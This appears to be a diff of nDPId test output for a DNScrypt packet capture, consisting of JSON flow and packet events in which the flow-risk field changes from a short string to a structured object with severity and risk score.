-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":445,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":57180,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":445,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":57180,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":446,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAABQlagAub0RTAsKAAABjgTMbwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":446,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":47621,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":946739348805,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAAXclakgAL0RJzcKAAABjgTMb7oFAbsGBMWkEXoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":47621,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":47621,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":448,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAABQlakAub0RTAoKAAABjgTMbwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":448,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":2,"flow_last_seen":946739348912,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739348912,"pkt":"ZmZmZmZmRERERERECABFAADWoIMAADQRymOOBMxvCgAAAQG7o6cAwiYzEX2BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAG0rJMeHQmadAAjPo7oVfCGn+vVnYNn+3VnMSzQY0rAkl3fyY6FeDYzevPOP9Wx6CFjMcHM\/npT74\/JxSlg\/ZQ+xYYapuSWJmSy0bkM5eaAYWq1iOjOwzrlApye0OOzsPbFhhqm5JYmZWX62h1l+todsSrmH"}
@@ -926,26 +926,26 @@
 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":2,"flow_last_seen":946739348917,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739348917,"pkt":"ZmZmZmZmRERERERECABFAADWoIgAADQRyl6OBMxvCgAAAQG7ugUAwg\/YEXqBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAG0rJMeHQmadAAjPo7oVfCGn+vVnYNn+3VnMSzQY0rAkl3fyY6FeDYzevPOP9Wx6CFjMcHM\/npT74\/JxSlg\/ZQ+xYYapuSWJmSy0bkM5eaAYWq1iOjOwzrlApye0OOzsPbFhhqm5JYmZWX62h1l+todsSrmH"}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":455,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":38371,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01138{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":946739380804,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739380804,"pkt":"REREREREZmZmZmZmCABFAAIc\/YZAAH4Rg9UKAAAB1C\/kiJXjAbsCCHuObd4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":38371,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":38371,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":456,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":34228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":946739380804,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739380804,"pkt":"REREREREZmZmZmZmCABFAAXcIEwgAH4RfVAKAAAB1C\/kiIW0AbsGBB6ibd0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":456,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":34228,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":456,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":34228,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":457,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":52056,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01138{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":946739380804,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739380804,"pkt":"REREREREZmZmZmZmCABFAAIc\/YdAAH4Rg9QKAAAB1C\/kiMtYAbsCCHuObeIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":457,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":52056,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":457,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":52056,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":458,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739380804,"pkt":"REREREREZmZmZmZmCABFAABQIEwAuX4RoiMKAAAB1C\/kiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":458,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":459,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":40775,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01138{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":946739380805,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739380805,"pkt":"REREREREZmZmZmZmCABFAAIc\/YhAAH4Rg9MKAAAB1C\/kiJ9HAbsCCHuObeABAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA